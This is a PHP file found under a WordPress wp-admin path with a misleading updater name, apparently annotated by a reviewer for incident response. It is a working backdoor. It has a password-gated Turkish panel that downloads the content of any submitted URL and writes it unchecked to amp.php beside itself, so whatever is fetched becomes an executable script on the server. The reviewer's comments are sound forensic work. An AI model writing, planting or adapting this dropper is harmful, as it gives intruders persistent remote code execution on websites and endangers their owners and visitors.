File: /home/zulfiqar/public_html/wp-admin/admins-updater.php
<?php
// Overview: a password-gated panel that downloads the body of an operator-supplied URL
// and writes it to amp.php next to this script.
// NOTE(review): the path recorded for this file is under wp-admin, yet the visible code
// calls no WordPress functions; verify the file against the core file list of the
// installed WordPress version.

// Start (or resume) the PHP session; the login flag and the CSRF token are stored in it.
session_start();
// Settings
// 32-hex-character value compared with md5() of the submitted password in the login gate.
// NOTE(review): this is an unsalted MD5 digest embedded in the file; as a fixed string it
// can also be searched for when looking for other copies of this file.
$hashedPassword = '8cf3082b71840375be062953f660687c';
// File the fetch handler deletes and rewrites: amp.php in this script's own directory.
$savePath = __DIR__ . '/amp.php';
// Assigned here but not referenced anywhere else in the visible code.
$testPath = __DIR__ . '/test.php';
// index.php one directory above this script; assigned here but not referenced anywhere
// else in the visible code.
$publicIndexPath = dirname(__DIR__) . '/index.php';
/**
 * Return the session's CSRF token, creating it on first use.
 *
 * When $_SESSION['csrf'] is empty, 32 bytes from random_bytes() are hex-encoded
 * (64 characters) and stored there; later calls return the stored value unchanged.
 *
 * @return string The token held in $_SESSION['csrf'].
 */
function generateCSRFToken() {
if (empty($_SESSION['csrf'])) {
$_SESSION['csrf'] = bin2hex(random_bytes(32));
}
return $_SESSION['csrf'];
}
// Login gate: runs only while the session has no 'authenticated' key.
// No attempt counter, delay or logging is visible in this block, so the web server's
// access log is the only record of POSTs to this path that the visible code leaves.
if (!isset($_SESSION['authenticated'])) {
// A POST carrying a 'password' field is treated as a login attempt.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
// md5() of the submitted value is compared with the embedded digest using ===.
if (md5($_POST['password']) === $hashedPassword) {
// Success: set the session flag, create the CSRF token, then redirect to this same
// script (path taken from $_SERVER['PHP_SELF']) and stop.
$_SESSION['authenticated'] = true;
generateCSRFToken();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
// Message text is Turkish for "Wrong password."
$error = "Hatalı şifre.";
}
}
// Still not authenticated: print the login form (labels in Turkish: "Giriş" = "Login",
// "Şifre" = "Password") and stop, so nothing below this block runs for such a request.
if (!isset($_SESSION['authenticated'])) {
echo '<!DOCTYPE html><html><head><title>Giriş</title></head><body>';
// $error can only hold the fixed literal assigned above at this point.
if (isset($error)) echo '<p style="color:red">' . $error . '</p>';
echo '<form method="POST">'
. '<label>Şifre:</label><br>'
. '<input type="password" name="password" required>'
. '<button type="submit">Giriş</button>'
. '</form></body></html>';
exit;
}
}
/**
 * Request a URL with cURL and return the response body.
 *
 * The handle follows redirects, times out after 10 seconds, keeps TLS peer
 * verification enabled and sends the fixed User-Agent 'SecureFetcher/1.0'.
 * No scheme or host restriction is applied here, so the request goes wherever
 * the supplied URL and any redirects lead.
 * NOTE(review): the User-Agent is a constant string, so it may help to find this
 * traffic in outbound proxy or remote server logs where those are available.
 *
 * @param string $url URL to request; handed to cURL unchanged.
 * @return string|false Response body, or false when curl_exec() fails or the body
 *                      is falsy (an empty string or "0"), because of the ?: operator.
 */
function fetchContent($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_USERAGENT => 'SecureFetcher/1.0'
]);
$data = curl_exec($ch);
curl_close($ch);
// Any falsy result is collapsed to false so callers can test with !== false.
return $data ?: false;
}
// Status strings shown by the template at the end of the file; both start empty here.
$success = '';
$error = '';
// Fetch handler: runs on a POST that carries csrf_token. The login gate above exits for
// sessions without the 'authenticated' key, so this point is reached only with it set.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token'])) {
// The posted token is compared with the session copy via hash_equals(); on mismatch the
// script stops with a Turkish message meaning "Invalid session token."
if (!hash_equals($_SESSION['csrf'], $_POST['csrf_token'])) {
die('Geçersiz oturum tokenı.');
}
$url = trim($_POST['target_url'] ?? '');
// FILTER_VALIDATE_URL is a syntax check only; the visible code applies no scheme or host
// restriction, so the server requests whatever well-formed URL was submitted.
if (!filter_var($url, FILTER_VALIDATE_URL)) {
// Turkish for "Invalid URL."
$error = 'Geçersiz URL.';
} else {
// Append the current Unix time as a 'timestamp' query parameter, using '&' when the URL
// already contains '?'. Presumably this is to avoid cached responses (TODO confirm).
$timestamp = time();
$finalUrl = $url . (strpos($url, '?') !== false ? '&' : '?') . 'timestamp=' . $timestamp;
$content = fetchContent($finalUrl);
if ($content !== false) {
// File deletion steps after the first load
// An existing amp.php is removed before the new content is written. The note appended
// to $success here (Turkish for "amp.php deleted") is overwritten by the plain
// assignment below whenever the write succeeds.
if (file_exists($savePath)) {
unlink($savePath);
$success .= '<br>✅ amp.php silindi';
}
// dirname($savePath) is this script's own directory; it is created (mode 0755,
// recursive) only if is_dir() reports it missing.
if (!is_dir(dirname($savePath))) mkdir(dirname($savePath), 0755, true);
// The response body is written to amp.php exactly as received, with no inspection of
// its content. Because the target has a .php extension, whatever the remote URL
// returned becomes a script file on this host. For incident response, treat amp.php
// beside this file as externally supplied and review it together with this file.
if (file_put_contents($savePath, $content) !== false) {
// Turkish for "Content saved successfully: "; the URL is HTML-escaped before display.
$success = 'İçerik başarıyla kaydedildi: ' . htmlspecialchars($finalUrl);
} else {
// Turkish for "File could not be saved!"
$error = 'Dosya kaydedilemedi!';
}
} else {
// Turkish for "Content could not be retrieved."
$error = 'İçerik alınamadı.';
}
}
}
// The template below prints $success and $error without further escaping; in this file
// the only request-derived text placed in them is the URL passed through
// htmlspecialchars() above. The form posts 'target_url' together with the session CSRF
// token back to this same script. Labels are Turkish: "Fetch Paneli" = "Fetch Panel",
// "İçerik ve Yönlendirme URL" = "Content and Redirect URL", "Gönder" = "Send".
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>Fetch Paneli</title>
<style>
body { font-family: Arial; background: #f4f4f4; padding: 40px; }
.box { background: #fff; padding: 20px; border-radius: 6px; max-width: 600px; margin: auto; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
input[type=text] { width: 100%; padding: 10px; margin: 10px 0; }
button { padding: 10px 20px; background: #007bff; color: #fff; border: none; border-radius: 4px; }
.success { color: green; }
.error { color: red; }
</style>
</head>
<body>
<div class="box">
<h2>🔐 Fetch & Replace Paneli</h2>
<?php if ($success): ?><p class="success">✅ <?= $success ?></p><?php endif; ?>
<?php if ($error): ?><p class="error">❌ <?= $error ?></p><?php endif; ?>
<form method="POST">
<label>İçerik ve Yönlendirme URL:</label>
<input type="text" name="target_url" placeholder="https://example.com/page" required>
<input type="hidden" name="csrf_token" value="<?= generateCSRFToken() ?>">
<button type="submit">Gönder</button>
</form>
</div>
</body>
</html>